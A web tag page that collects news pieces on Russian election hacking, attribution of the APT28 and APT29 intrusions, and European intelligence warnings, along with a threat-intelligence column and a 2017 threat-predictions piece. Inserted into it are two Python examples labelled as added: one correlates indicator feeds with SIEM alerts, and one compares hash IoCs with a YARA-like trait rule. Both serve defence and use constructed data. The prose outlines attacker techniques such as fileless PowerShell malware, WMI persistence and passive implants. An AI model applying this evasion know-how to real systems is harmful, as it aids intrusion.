
Tag: Information Warfare

Shortage of skilled “cyber operators” has services scrambling to find ways to recruit.
Facebook's security team doesn't disagree with the US Director of National Intelligence's conclusion that Russia tried to sway the US Presidential election.
Image caption: Julian Assange's Wikileaks is shocked—shocked—that someone would leak secrets for political reasons. (Ben Stansall/AFP via Getty Images)

On Thursday, NBC News broadcast a report claiming to have exclusive details from the top-secret version of the intelligence community report on Russian hacking and information warfare activities delivered to President Barack Obama—a report scheduled to be delivered by intelligence officials to President-elect Donald Trump today. The NBC report followed a Washington Post report based on information from anonymous “US officials” about intercepted communications between Russian leaders celebrating Donald Trump’s election as a victory. The NBC report drew an instant rebuke via Twitter from Trump. WikiLeaks, which has previously published leaked highly classified US intelligence data, cried foul over the leaks.

    How did NBC get "an exclusive look into the top secret report he (Obama) was presented?" Who gave them this report and why? Politics!
    — Donald J. Trump (@realDonaldTrump) January 6, 2017

    The Obama admin/CIA is illegally funneling TOP SECRET//COMINT information to NBC for political reasons before PEOTUS even gets to read it.
    — WikiLeaks (@wikileaks) January 6, 2017

The parade of leaks regarding the US intelligence assessment about Russian hacking is notable given the Obama administration’s past crackdown on leaks, which has included a record number of prosecutions against those leaking information to journalists. The leaks are likely motivated by Trump’s frequent dismissal of official intelligence community statements regarding the alleged involvement of the Russian government in the hacking and dissemination of information from the Democratic National Committee and the Clinton campaigns.
According to the NBC report, the 50-plus page classified version of the intelligence community report details Russian digital espionage operations dating as far back as 2008, including the breach of e-mail systems at the White House, State Department, the Joint Chiefs of Staff, and US corporations, in addition to the attacks focused on the DNC and the Hillary Clinton presidential campaign. Those details would present a more complete picture of the various "threat groups" lumped into the recent FBI/Department of Homeland Security Joint Analysis Report as "Grizzly Steppe."

President Obama has not yet received the report, but he was given a briefing on its contents on Thursday. A final Top Secret, Compartmented Information version of the report will be delivered to cleared members of the administration and the Trump transition team today; Congress will receive a classified version of the report on Monday, and an unclassified version is expected to be made public early next week.

Early today, in an interview with the New York Times, Trump referred to the intelligence community's focus on the Russian hacking as a politically motivated attack against him. Referencing the breach of the Office of Personnel Management, Trump said, “China, relatively recently, hacked 20 million government names. How come nobody even talks about that? This is a political witch hunt.”
Image caption: (L-R) Defense Undersecretary for Intelligence Marcell Lettre II, Director of National Intelligence James Clapper, and United States Cyber Command and National Security Agency Director Admiral Michael Rogers testify before the Senate Armed Services Committee. (Chip Somodevilla / Getty Images)

In a hearing before the Senate Armed Services Committee—a regularly scheduled unclassified briefing on "foreign cyber threats"—Director of National Intelligence James Clapper did very little to preview a report on Russian "cyber" activities around the US elections scheduled to be delivered to President Barack Obama this week.

Clapper did say that an unclassified version of the report would be released to the public early next week. However, that version is unlikely to contain any new specific evidence to support the intelligence community's assertions that the Russian government directed hacking and propaganda operations against Hillary Clinton and the Democratic Party in an attempt to deliberately affect the outcome of the US election. "We plan to brief the Congress and release an unclassified version of this report early next week, with due deference to the protection of highly fragile sources and methods," Clapper said in his opening statement. "We have invested billions, and we put people's lives at risk to get such information. If we were to expose how we got this, we could just kiss that off. We're going to be as forthcoming as possible."

Clapper and National Security Agency Director Admiral Michael Rogers both asserted, however, that the intelligence community was even more certain of Putin's involvement in the meddling in the US election than they were when the Department of Homeland Security (DHS) and the Office of the Director of National Intelligence issued a joint statement in October. "We stand more resolutely now on that statement than we did on the seventh of October," Clapper said. While Clapper said it was almost certain that no votes had been changed by hacking, he noted there was no way to determine the full impact of Russia's information campaign on voters' opinions—"We in the Intelligence Community can't tally that."

Much of what Clapper and Rogers said in their testimony echoes data already available from commercial security firms and other sources, as well as the somewhat limited data shared in the DHS-FBI "joint analysis report" (JAR) issued last week.

The report to be delivered to the president will, however, take in the whole of the alleged Russian campaign to influence the election, including the use of Russian state-funded media, social media, and "fake news" to spread disinformation.

The report will likely also include specific data on how the intelligence community linked Putin to the sharing of breached data from the Democratic National Committee and others (including Clinton Campaign Chairman John Podesta) to Wikileaks. In response to a question from the committee on the role of "fake news" disinformation in Russia's election meddling, Clapper said, "Without getting too far in front of the headlights of [the upcoming report], this was a multifaceted campaign—the hacking was only one part of it. It also entailed classical propaganda, disinformation, and fake news." Clapper acknowledged that the same sort of campaign was ongoing in Europe now, around the upcoming French and German elections.

That mirrors forensic evidence that Ars has examined recently in our attempts to connect the dots between operations from the organization behind the "Fancy Bear" group of malware, tools and infrastructure used in the DNC, Democratic Congressional Campaign Committee, and Clinton campaign breaches, and the theft of data from the World Anti-Doping Agency (WADA). Servers used in connection with some of the spear phishing attacks connected to these breaches have also been used to target French Gmail users recently. (More details of that activity and how it is connected to the information campaign against the Democrats in the US elections are being pulled together for an upcoming Ars report.)

Many of the senators from both parties on the Armed Services Committee, including Sen. John McCain (R-Ariz.) and Sen. Lindsey Graham (R-S.C.), threw barbs at President-elect Donald Trump for his treatment of the intelligence community and his posts apparently professing greater trust in Julian Assange than US intelligence.

Citing Assange as "the one responsible for publishing the names of people who worked for us" in Iraq and Afghanistan plus the subject of a criminal investigation, McCain asked Clapper and Rogers, "Do you think there's any credibility that we should attach to his statements?" Clapper replied frankly: "Not in my view."

For his part, Donald Trump tried to back away from the appearance of endorsing Assange via Twitter:

    The dishonest media likes saying that I am in Agreement with Julian Assange - wrong. I simply state what he states, it is for the people.... to make up their own minds as to the truth. The media lies to make it look like I am against "Intelligence" when in fact I am a big fan!

Graham was particularly angry at Trump for being overly critical and disrespectful of the intelligence community. "You don't want to undermine those people serving in this arena," he said. He also suggested Obama's sanctions against Russia amounted to "throwing pebbles" when it was time to "throw rocks," because the active campaign to interfere in the US election went far beyond passive espionage. Graham noted that Republicans should be concerned that someone else might do the same thing to them if Trump were to take on China or Iran, and the response to the Russian information operations was an opportunity to deter future interference in the democratic process. “It’s not like we’re so much better at cyber security than Democrats,” he said.

Another area Graham focused on was the US Information Agency, the government operator of Radio Free Europe, and other US foreign information operations. He suggested this agency was too archaic in its focus on broadcasting.

Clapper agreed, saying in his closing remarks that what was needed to counter information warfare was a "USIA on steroids"—a new information organization that could take on misinformation from adversaries more aggressively in social media and other places online as well as in the broadcast realm. Russia has used the state-funded RT broadcast service and other outlets to more aggressively spread its version of the global narrative over the past few years.

The country has reportedly even used "troll factories" to create confusion and support nationalist populism in several European countries.
You must be prepared for foreseeable attacks as well as the ones that sneak up on you.

Organizations deal with two types of cyberthreats: hurricanes and earthquakes. Hurricanes are those attacks you can see coming; earthquakes, you can't. Both are inevitable, and you need to plan and take action accordingly. This starts with an understanding of what threat intelligence is and how to make it relevant and actionable. Threat intelligence can help you transition from constantly reacting to being proactive. It allows you to prepare for the hurricanes and respond to the earthquakes with an efficient, integrated approach.

Eliminate Noise

Mention threat intelligence and most organizations think about multiple data feeds to which they subscribe — commercial sources, open source, and additional feeds from security vendors — each in a different format and most without any context to allow for prioritization. This global threat data gives some insight into activities happening outside of your enterprise — not only attacks themselves, but how attackers are operating and infiltrating networks. The challenge is that most organizations suffer from data overload. Without the tools and insights to automatically sift through mountains of disparate global data and aggregate it for analysts and action, this threat data becomes noise: you have alerts around attacks that aren't contextualized, relevant, or a priority. To make more effective use of this data, it must be aggregated in one manageable location and translated into a uniform format so that you can automatically get rid of the noise and focus on what's important.

Focus on Threats

With global threat data organized, you can focus on the hurricanes and earthquakes that threaten your organization. Hurricanes are the threats you know about, can prepare for, protect against, and anticipate based on past trends. For example, based on research, say that we know a file is malware. This intelligence should be operationalized — turned into a policy, a rule, or signature and sent to the appropriate sensor — so that it can prevent bad actors from stealing valuable data, creating a disruption, or causing damage. As security operations become more mature, you can start to get alerts on these known threats in addition to automatically blocking them so you can learn more about the adversary. This allows you to focus on the attacks that really matter.

Earthquakes are unknown threats, or threats that you may not have adequate countermeasures against, that have bypassed existing defenses. Once they're inside the network, your job is to detect, respond, and recover. This hinges on the ability to turn global threat data into threat intelligence by enriching that data with internal threat and event data and allowing analysts to collaborate for better decision making. Threat intelligence helps you better scope the campaign once the threat is detected, learn more about the adversary, and understand affected systems and how to best remediate. By correlating events and associated indicators from inside your environment (e.g., SIEM alerts or case management records) with external data on indicators, adversaries, and their methods, you gain the context to understand the who, what, when, where, why, and how of an attack. Going a step further, applying context to your business processes and assets helps you assess relevance. Is anything the organization cares about at risk? If the answer is "no," then what you suspected to be a threat is low priority. If the answer is "yes," then it's a threat. Either way, you have the intelligence you need to quickly take action.

Make Intelligence Actionable

Intelligence has three attributes that help define "actionable":

- Accuracy: Is the intelligence reliable and detailed?
- Relevance: Does the intelligence apply to your business or industry?
- Timeliness: Is the intelligence being received with enough time to do something?

An old industry joke is that you can only have two of the three, so you need to determine what's most important to your business. If you need intelligence as fast as possible to deploy to your sensors, then accuracy may suffer and you might expect some false positives. If the intelligence is accurate and timely, then you may not have been able to conduct thorough analysis to determine if the intelligence is relevant to your business. This could result in expending resources on something that doesn't present a lot of risk.

Ultimately, the goal is to make threat intelligence actionable. But actionable is defined by the user. The security operations center typically looks for IP addresses, domain names, and other indicators of compromise — anything that will help to detect and contain a threat and prevent it in the future. For the network team, it's about hardening defenses with information on vulnerabilities, signatures, and rules to update firewalls, and patch and vulnerability management systems. The incident response team needs intelligence about the adversary and the campaigns involved so they can investigate and remediate. And the executive team and board need intelligence about threats in business terms — the financial and operational impact — in order to increase revenue and protect shareholders and the company as a whole. Analysts must work together and across the organization to provide the right intelligence in the right format and with the right frequency so that it can be used by multiple teams.

Operationalizing threat intelligence takes time and a plan. Many organizations are already moving from a reactive mode to being more proactive. But to make time to look out at the horizon and see and prepare for hurricanes while also dealing with earthquakes, organizations need to move to an anticipatory model with contextual intelligence, relevance, and visibility into trends in the threat landscape.
As Senior VP of Strategy of ThreatQuotient, Jonathan Couch utilizes his 20+ years of experience in information security, information warfare, and intelligence collection to focus on the development of people, process, and technology within client organizations to assist in ...
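The aggregate, normalize, correlate and prioritize cycle the column describes, as an added example that is not part of the original column or of any ThreatQuotient product: two constructed feeds in different formats are merged into one uniform indicator set, matched against constructed SIEM alerts, and each hit is scored on accuracy, relevance and timeliness. The feed formats, the asset criticality scale and the scoring weights are assumptions chosen for illustration.

```python
import csv
import io
import json
from datetime import datetime, timezone

# Constructed sample feed A: CSV from a hypothetical commercial vendor.
FEED_A_CSV = """indicator,kind,confidence,first_seen
203.0.113.7,ipv4,90,2017-09-20T08:00:00Z
malware-dl.example,domain,60,2017-06-01T00:00:00Z
"""

# Constructed sample feed B: JSON lines from a hypothetical open-source feed.
FEED_B_JSONL = """{"value": "203.0.113.7", "type": "ip", "score": 0.7, "ts": "2017-09-24T12:30:00Z"}
{"value": "198.51.100.9", "type": "ip", "score": 0.4, "ts": "2017-09-25T01:00:00Z"}
"""

# Constructed asset inventory: business criticality 1 (low) to 3 (high).
ASSET_CRITICALITY = {"db01": 3, "ws-042": 1}

# Constructed internal SIEM alerts: host, destination contacted, alert time.
SIEM_ALERTS = [
    {"host": "db01", "dest": "203.0.113.7", "time": "2017-09-26T09:15:00Z"},
    {"host": "ws-042", "dest": "malware-dl.example", "time": "2017-09-26T09:20:00Z"},
    {"host": "ws-042", "dest": "192.0.2.1", "time": "2017-09-26T09:21:00Z"},
]


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def normalize_feeds(feed_a_csv, feed_b_jsonl):
    """Translate both feeds into one uniform record per indicator value.

    Record: {"type", "confidence" (0..1), "last_seen" (datetime), "sources" (set)}.
    An indicator reported by several feeds is merged once: highest confidence
    and latest sighting win, and every reporting source is kept. This is the
    aggregation step that turns overlapping feeds into one manageable set.
    """
    indicators = {}

    def merge(value, itype, confidence, seen, source):
        rec = indicators.setdefault(
            value, {"type": itype, "confidence": 0.0, "last_seen": seen, "sources": set()})
        rec["confidence"] = max(rec["confidence"], confidence)
        rec["last_seen"] = max(rec["last_seen"], seen)
        rec["sources"].add(source)

    for row in csv.DictReader(io.StringIO(feed_a_csv)):
        itype = "ip" if row["kind"] == "ipv4" else row["kind"]  # map vendor vocabulary
        merge(row["indicator"], itype, int(row["confidence"]) / 100.0,
              parse_time(row["first_seen"]), "feed_a")

    for line in feed_b_jsonl.splitlines():
        if line.strip():
            obj = json.loads(line)
            merge(obj["value"], obj["type"], float(obj["score"]),
                  parse_time(obj["ts"]), "feed_b")
    return indicators


def correlate(alerts, indicators, assets, now, max_age_days=30):
    """Match internal alerts against the indicator set and rank the hits.

    accuracy   : merged feed confidence, nudged up when several sources agree
    relevance  : criticality of the affected asset (0 for an unknown host)
    timeliness : 1.0 for a fresh sighting, decaying to 0 at max_age_days
    Alerts whose destination is unknown to the feeds are passed over: the feeds
    can say nothing about them, so they stay with the other detection paths.
    """
    hits = []
    for alert in alerts:
        rec = indicators.get(alert["dest"])
        if rec is None:
            continue
        age_days = (now - rec["last_seen"]).total_seconds() / 86400.0
        timeliness = max(0.0, 1.0 - age_days / max_age_days)
        accuracy = min(1.0, rec["confidence"] + 0.1 * (len(rec["sources"]) - 1))
        relevance = assets.get(alert["host"], 0) / 3.0
        hits.append({
            "host": alert["host"], "indicator": alert["dest"],
            "sources": sorted(rec["sources"]),
            "accuracy": round(accuracy, 2), "relevance": round(relevance, 2),
            "timeliness": round(timeliness, 2),
            "priority": round(accuracy * relevance * timeliness, 3),
        })
    return sorted(hits, key=lambda h: h["priority"], reverse=True)


def run(now="2017-09-26T10:00:00Z"):
    """Normalize the sample feeds, correlate the sample alerts, return ranked hits."""
    return correlate(SIEM_ALERTS, normalize_feeds(FEED_A_CSV, FEED_B_JSONL),
                     ASSET_CRITICALITY, parse_time(now))

if __name__ == "__main__":
    for hit in run():
        print(hit)
```

The stale domain sighting on a low-value workstation scores zero on timeliness and drops to the bottom, while the corroborated, recently seen address contacted by the critical database host ranks first; the unknown destination never enters the ranking at all.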
Image caption: Trump denies there's any truth to intelligence community claims of Russian interference in the election, claiming it could have been anyone. (Chip Somodevilla | Getty Images)

President-elect Donald Trump continues to discount or attempt to discredit reports that the intelligence community has linked the hacking of the DNC, the Hillary Clinton presidential campaign, and related information operations with a Russian effort to prevent Clinton from winning the election—thus assuring Trump's victory. In his latest of a stream of tweets, Trump posted:

    Unless you catch "hackers" in the act, it is very hard to determine who was doing the hacking. Why wasn't this brought up before election?
    — Donald J. Trump (@realDonaldTrump) December 12, 2016

The hacking was brought up well before the election. And it was monitored as it was happening—by the intelligence and law enforcement communities and by private information security firms. "CrowdStrike's Falcon endpoint technology did catch the adversaries in the act," said Dmitri Alperovitch, chief technology officer of Crowdstrike. "When the DNC brought us in to conduct an investigation in May 2016, we deployed this technology on every system within DNC's corporate network and were able to watch everything that the adversaries were doing while we were working on a full remediation plan to remove them from the network."

Much of the evidence from Crowdstrike and other security researchers has been public since June and July. But while the hackers may have been caught in the act digitally, the details by themselves don't offer definitive proof of the identity of those behind the anti-Clinton hacking campaign. Public details currently don't offer clear insight into the specific intent behind these hacks, either. What is indisputable, however, is the existence of genuine hacking evidence.
And this information certainly does provide enough to give the reported intelligence community findings some context.

The evidence

The FBI warned the DNC of a potential ongoing breach of their network in November of 2015. But the first hard evidence of an attack detected by a non-government agency was a spear-phishing campaign being tracked by Dell SecureWorks. That campaign began to target the DNC, the Clinton campaign, and others in the middle of March 2016, and it ran through mid-April. This campaign was linked to a "threat group" (designated variously as APT28, Sofacy, Strontium, Pawn Storm, and Fancy Bear) that had previously been tied to spear-phishing attacks on military, government, and non-governmental organizations. "[SecureWorks] researchers assess with moderate confidence that the group is operating from the Russian Federation and is gathering intelligence on behalf of the Russian government," the report from SecureWorks concluded.

The DNC's information technology team first alerted party officials that there was a potential security problem in late March, but the DNC didn't bring in outside help until May. This is when CrowdStrike's incident response team was brought in. CrowdStrike identified two separate ongoing breaches, as detailed in a June 15, 2016 blog post by CrowdStrike CTO Dmitri Alperovitch. The findings were based both on malware samples found and a monitoring of the breach while it was in progress. One of those attacks, based on the malware and command and control traffic, was attributed to Fancy Bear. The malware deployed by Fancy Bear was a combination of an agent disguised as a Windows driver file (named twain_64.dll) and a network tunneling tool that allowed remote control connections.

The other breach, which may have been the breach hinted at by the FBI, was a long-running intrusion by a group previously identified as APT29, also known as The Dukes or Cozy Bear. Cozy Bear ran SeaDaddy (also known as SeaDuke, a backdoor developed in Python and compiled as a Windows executable) as well as a one-line Windows PowerShell command that exploited Microsoft's Windows Management Instrumentation (WMI) system. The exploit allowed attackers to persist in WMI's database and execute based on a schedule. Researchers at Fidelis who were given access to malware samples from the hack confirmed that attribution.

In addition to targeting the DNC and the Clinton campaign's Google Apps accounts, the spear-phishing messages connected to the campaign discovered by SecureWorks also went after a number of personal Gmail accounts. It was later discovered that the campaign had compromised the Gmail accounts of Clinton campaign chair John Podesta, former Secretary of State Colin Powell, and a number of other individuals connected to the Clinton campaign and the White House. Many of those e-mails ended up on DC Leaks. The Wikileaks posting of the Podesta e-mails includes an e-mail containing the link used to deliver the malware.

After Crowdstrike and the DNC revealed the hacks and attributed them to Russian intelligence-connected groups, some of the files taken from the DNC were posted on a website by someone using the name Guccifer 2.0. While the individual claimed to be Romanian, documents in the initial dump from the DNC by Guccifer 2.0 were found to have been edited using a Russian-language version of Word and by someone using a computer named for Felix Dzerzhinsky, founder of the Soviet secret police. (The documents are linked in this article by Ars' Dan Goodin.) In addition to publishing on his or her own WordPress site, Guccifer used the DC Leaks site to provide an early look at new documents to The Smoking Gun using administrative access. The Smoking Gun contacted one of the victims of the breach and confirmed he had been targeted using the same spear-phishing attack used against Podesta.
The DC Leaks site also contains a small number of e-mails from state Republican party operatives. Thus far, no national GOP e-mails have been released. (The New York Times reports that intelligence officials claim the Republican National Committee was also penetrated by attackers, but its e-mails were never published.)

Attribution and motive

There are several factors used to attribute these hacks to someone working on behalf of Russian intelligence. In the case of Fancy Bear, attribution is based on details from a number of assessments by security researchers. These include:

- Focus of purpose. The methods and malware families used in these campaigns are specifically built for espionage.
- The targets. A list of previous targets of Fancy Bear malware includes: individuals in Russia and the former Soviet states who may be of intelligence interest; current and former members of NATO states' governments and militaries; Western defense contractors and suppliers; and journalists and authors. Fancy Bear malware was also used in the spear-phishing attack on the International Olympic Committee to gain access to the World Anti-Doping Agency's systems. This allowed the group to discredit athletes after many Russian athletes were banned from this year's Summer Games.
- Long-term investment. The code in malware and tools is regularly and professionally updated and maintained—while maintaining a platform approach. The investment suggests an operation funded to provide long-term data espionage and information warfare capabilities.
- Language and location. Artifacts in the code indicate it was written by Russian speakers in the same time zone as Moscow and St. Petersburg, according to a FireEye report.

These don't necessarily point to Fancy Bear being directly operated by Russian intelligence. Other information operations out of Russia (including the "troll factory" operated out of St. Petersburg to spread disinformation and intimidate people) have had tenuous connections to the government. Scott DePasquale and Michael Daly of the Atlantic Council suggested in an October Politico article that the DNC hack and other information operations surrounding the US presidential campaign may have been the work of "cyber mercenaries"—in essence, outsourcing outfits working as contractors for Russian intelligence. There is also an extremely remote possibility that all of this has been some sort of "false flag" operation by someone else with extremely deep pockets and a political agenda. WikiLeaks' Julian Assange has insisted that the Russian government is not the source of the Podesta and DNC e-mails. That may well be true, and it can still be true even if the Russian government had a hand in directing or funding the operation.

But that is all speculation—the only way that the full scope of Russia's involvement in the hacking campaign and other aspects of the information campaign against Clinton (and for Trump) will be known is if the Obama administration publishes conclusive evidence in a form that can be independently analyzed.
Image caption: The bear is back. It never went away.

US intelligence agencies have been forthright in their insistence that the Russian government was behind not only the hacking of the Democratic National Committee (DNC) and other political organizations in the US, but a concerted effort to undermine confidence in the results of the US presidential election, including attacks on state election officials' systems.

But the US is not the only country that the Russian government has apparently targeted for these sorts of operations—and the methods used in the DNC hack are being applied increasingly in attempts to influence German politics, Germany's chief of domestic intelligence warned yesterday. In a press release issued on December 8, Germany's Bundesamt für Verfassungsschutz (BfV), the country's domestic intelligence agency, warned of an ever-mounting wave of disinformation and hacking campaigns by Russia focused on increasing the strength of "extremist groups and parties" in Germany and destabilizing the German government.
In addition to propaganda and disinformation campaigns launched through social media, the BfV noted an increased number of "spear phishing attacks against German political parties and parliamentary groups" using the same sort of malware used against the Democratic National Committee in the US. The statement from the BfV came on the same day that Alex Younger, the chief of the United Kingdom's Secret Intelligence Service (MI6) made more veiled references to disinformation and hacking campaigns.
In remarks Younger delivered at Vauxhall Cross, MI6 headquarters, he warned of the mounting risks posed by "hybrid warfare." "The connectivity that is at the heart of globalization can be exploited by States with hostile intent to further their aims deniably," Younger said. "They do this through means as varied as cyber-attacks, propaganda or subversion of democratic process… The risks at stake are profound and represent a fundamental threat to our sovereignty; they should be a concern to all those who share democratic values." The statement from the BfV follows one by German Chancellor Angela Merkel last week voicing concerns that Russia would attempt to interfere in the 2017 German elections.
In the release, BfV Chief Hans-Georg Maassen warned that these "propaganda and disinformation attacks, cyber espionage, and cyber sabotage are part of hybrid threats against Western democracies." He added that the way people use social media to obtain news was aiding disinformation campaigns. "We are concerned that echo chambers are emerging that make the formation of domestic political opinions highly vulnerable to automated opinion-shaping," Maassen warned. The campaign includes the "enormous use of financial resources" to fund disinformation campaigns, the BfV reported.

The disinformation campaigns have been accompanied by an increase in targeted malware attacks on German politicians.

The BfV attributed these attacks to the threat group known as APT 28, also known as Fancy Bear—a group that US intelligence and information security researchers have tied to Russian intelligence.
In 2015, APT 28 "successfully exfiltrated data from the German Bundestag," Germany's parliament, the BfV release noted. Many of these attacks have been launched as "false flag" operations—with the attackers posing as "hacktivists," much as Guccifer 2.0 and the DC Leaks campaigns tied to APT 28 did.

The combined use of disinformation in social media and in state-funded media, social media "trolling," and concerted hacking efforts against political institutions is part of a long pattern of behavior by Russia, shaped by Russia's doctrine of information warfare and deterrence. Russia is generally believed to have been behind cyber-attacks and propaganda operations against Estonia and Ukraine, among other former Soviet states, and has reportedly been behind similar operations in Poland.

Given the effect that the DNC hack and other information warfare had in the US—not necessarily influencing the final results, but creating the impression that Russia could directly interfere in US politics—Estonian Foreign Minister Sven Mikser told Reuters at a meeting of the Organization for Security and Cooperation in Europe on December 8, "It's a pretty safe bet that they will try to do it again, and they will try to surprise us. That’s something that we should be very careful to look at and try to protect ourselves from."
Yet another year has flown past and, as far as notable infosec happenings are concerned, this is one for the history books.

Drama, intrigue and exploits have plagued 2016 and, as we take stock of some of the more noteworthy stories, we once again cast our gaze forward to glean the shapes of the 2017 threat landscape. Rather than thinly-veiled vendor pitching, we hope to ground these predictions in trends we’ve observed in the course of our research and provide thought-provoking observations for researchers and visitors to the threat intelligence space alike.

Our record

Last year’s predictions fared well, with some coming to fruition ahead of schedule.
In case you didn’t commit these to memory, some of the more notable predictions included:

- APTs: We anticipated a decreased emphasis on persistence as well as an increased propensity to hide in plain sight by employing commodity malware in targeted attacks. We’ve seen this, both with an increase in memory or fileless malware as well as through the myriad reported targeted attacks on activists and companies, which relied on off-the-shelf malware like NJRat and Alienspy/Adwind.
- Ransomware: 2016 can be declared the year of ransomware. Financial malware aimed at victimizing users has practically been galvanized into a ransomware-only space, with the more effective extortion scheme cannibalizing malware development resources from less profitable attempts at victimizing users.
- Bank Heists: When we considered the looming expansion of financial crime at the highest level, our hypothetical included targeting institutions like the stock exchange. But it was the attacks on the SWIFT network that brought these predictions to bear, with millions walking out the door thanks to crafty, well-placed malware.
- Internet Attacks: Most recently, the oft-ignored world of sub-standard Internet-connected devices finally came to bear on our lives in the form of a nasty IoT botnet that caused outages for major Internet services, and hiccups for those relying on a specific DNS provider.
- Shame: Shame and extortion have continued to great fanfare as strategic and indiscriminate dumps have caused personal, reputational, and political problems left and right. We must admit that the scale and victims of some of these leaks have been genuinely astonishing to us.

Forecast for 2017: time to start using Yara rules more extensively as IoCs become less effective

What does 2017 have in store?

Those dreaded APTs

The rise of bespoke and passive implants

As hard as it is to get companies and large-scale enterprises to adopt protective measures, we also need to admit when these measures start to wear thin, fray, or fail.
Indicators of Compromise (IoCs) are a great way to share traits of already known malware, such as hashes, domains, or execution traits, that allow defenders to recognize an active infection. However, the trendsetting one-percenters of the cyberespionage game have learned to defend against these generalized measures, as showcased by the recent ProjectSauron APT, a truly bespoke malware platform whose every feature was altered to fit each victim, so that an IoC extracted from one infection would not help defenders detect any other. The weakness is structural: a file hash or a command-and-control domain costs the attacker nothing to change per target, whereas the code fragments, tooling quirks, and techniques that a good rule captures are far more expensive to rework.
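To make the distinction concrete, here is an added example in Python (not code from the original article or from any vendor): two constructed byte blobs stand in for two builds of one hypothetical implant, each tailored to a different victim, and a constructed buffer stands in for a process memory image. A hash IoC taken from the first build misses the second; a trait rule with a YARA-style "2 of 3 strings" condition, implemented here in a few lines rather than with the real YARA engine, catches both and also finds the fragment in memory. The sample names, strings, offsets and the two-of-three condition are all assumptions made for the example.

```python
"""Hash IoCs versus trait rules against per-victim builds (added example)."""
from __future__ import annotations

import hashlib

# --- Constructed samples (not real malware) ---------------------------------
# Two builds of the same hypothetical implant. Everything a hash IoC keys on
# (the whole file) differs because the per-victim config block differs; the
# code and strings a trait rule keys on are identical between builds.
SHARED_CODE = b"\x8b\x45\x08\x31\xc0\x5d\xc3"     # constructed code fragment
SHARED_SYMBOL = b"ImplantCore::Dispatch"           # constructed internal symbol
SHARED_PATHFMT = b"/tmp/.s3c-%04x"                 # constructed path format


def build_sample(victim: str, c2: str) -> bytes:
    """Assemble a per-victim build: same code and strings, different config."""
    cfg = f"cfg:victim={victim};c2={c2}".encode()
    return (b"MZ\x90\x00" + cfg + b"\x00" * 8 + SHARED_CODE + b"\x00" * 4
            + SHARED_SYMBOL + b"\x00" + SHARED_PATHFMT + b"\x00" * 4)


SAMPLE_A = build_sample("ACME", "update.acme.example")
SAMPLE_B = build_sample("GLOBEX", "cdn.globex.example")


# --- Hash IoC: atomic, exact-match indicator --------------------------------
def sha256_hex(blob: bytes) -> str:
    return hashlib.sha256(blob).hexdigest()


def hash_ioc_hit(blob: bytes, known_hashes: set[str]) -> bool:
    """True only for the exact file whose hash was shared."""
    return sha256_hex(blob) in known_hashes


# --- Trait rule: simplified YARA-like 'strings' + 'N of them' condition ----
class TraitRule:
    def __init__(self, name: str, strings: dict[str, bytes], min_hits: int):
        self.name, self.strings, self.min_hits = name, strings, min_hits

    def matched_strings(self, blob: bytes) -> dict[str, list[int]]:
        """Every string id that occurs in blob, with all of its offsets."""
        hits: dict[str, list[int]] = {}
        for sid, pat in self.strings.items():
            offs, start = [], 0
            while (i := blob.find(pat, start)) != -1:
                offs.append(i)
                start = i + 1
            if offs:
                hits[sid] = offs
        return hits

    def matches(self, blob: bytes) -> bool:
        return len(self.matched_strings(blob)) >= self.min_hits


IMPLANT_RULE = TraitRule(
    "hypothetical_implant_family",
    {"$code": SHARED_CODE, "$sym": SHARED_SYMBOL, "$path": SHARED_PATHFMT},
    min_hits=2,  # any 2 of 3 traits; survives one of them being rebuilt
)


# --- Memory scanning: the same rule over a process image --------------------
def scan_memory(image: bytes, rule: TraitRule, page: int = 4096) -> list[int]:
    """Page-aligned offsets of pages where the rule fires. Windows overlap
    by the longest string so a trait straddling a page boundary still hits."""
    overlap = max(len(p) for p in rule.strings.values()) - 1
    return [off for off in range(0, len(image), page)
            if rule.matches(image[off:off + page + overlap])]


# Constructed 'memory image': page 0 is empty, page 1 holds a header-less
# fragment of SAMPLE_B, the way an in-memory-only stage would appear.
MEMORY_IMAGE = (bytes(4096) + bytes(1000) + SAMPLE_B[4:]
                + bytes(4096 - 1000 - len(SAMPLE_B) + 4))


def demo() -> dict:
    iocs = {sha256_hex(SAMPLE_A)}  # the hash shared after victim A's incident
    return {
        "hash_hits_A": hash_ioc_hit(SAMPLE_A, iocs),
        "hash_hits_B": hash_ioc_hit(SAMPLE_B, iocs),  # per-victim build: miss
        "rule_hits_A": IMPLANT_RULE.matches(SAMPLE_A),
        "rule_hits_B": IMPLANT_RULE.matches(SAMPLE_B),
        "memory_pages": scan_memory(MEMORY_IMAGE, IMPLANT_RULE),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The asymmetry is the point: changing the configuration block invalidated the hash at zero cost to the attacker, while the rule still fires with one of its three traits removed. The `min_hits` condition is the part worth tuning when the same idea is carried over to real yara rules or a memory scanner, since a 1-of-N condition on short byte strings will produce false positives across an enterprise.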

That is not to say that defenders are entirely without recourse, but it is time to push for the wider adoption of good Yara rules that allow us to scan far and wide across an enterprise, inspect and identify traits in binaries at rest, and scan memory for fragments of known attacks.

ProjectSauron also showcased another sophisticated trait we expect to see on the rise, that of the 'passive implant'.

A network-driven backdoor, present in memory or as a backdoored driver in an internet gateway or internet-facing server, silently awaiting magic bytes to awaken its functionality. Until woken by its masters, passive implants present little or no outward indication of an active infection and are thus least likely to be found by anyone except the most paranoid of defenders, or as part of a wider incident response scenario. Keep in mind that these implants have no predefined command-and-control infrastructure for defenders to correlate, which gives the operator a more anonymous beachhead: there is no beaconing to catch in network flows, so the hunt has to look at the device itself, at unexpected listening hooks, modified drivers or firmware, and memory that does not match the vendor's image.

Thus, this is the tool of choice for the most cautious attackers, who must ensure a way into a target network at a moment's notice.

Ephemeral infections

While PowerShell has risen as a dream tool for Windows administrators, it has also proven fruitful ground for the gamut of malware developers looking for stealthy deployment, lateral movement, and reconnaissance capabilities that a standard configuration is unlikely to log: Script Block Logging, introduced with PowerShell 5.0, and system-wide transcription have to be switched on by policy.

Tiny PowerShell malware stored in memory or in the registry is likely to have a field day on modern Windows systems.

Taking this further, we expect to see ephemeral infections: memory-resident malware intended for general reconnaissance and credential collection with no interest in persistence.
In highly sensitive environments, stealthy attackers may be satisfied to operate until a reboot wipes their infection from memory if it means avoiding all suspicion or potential operational loss from the discovery of their malware by defenders and researchers.
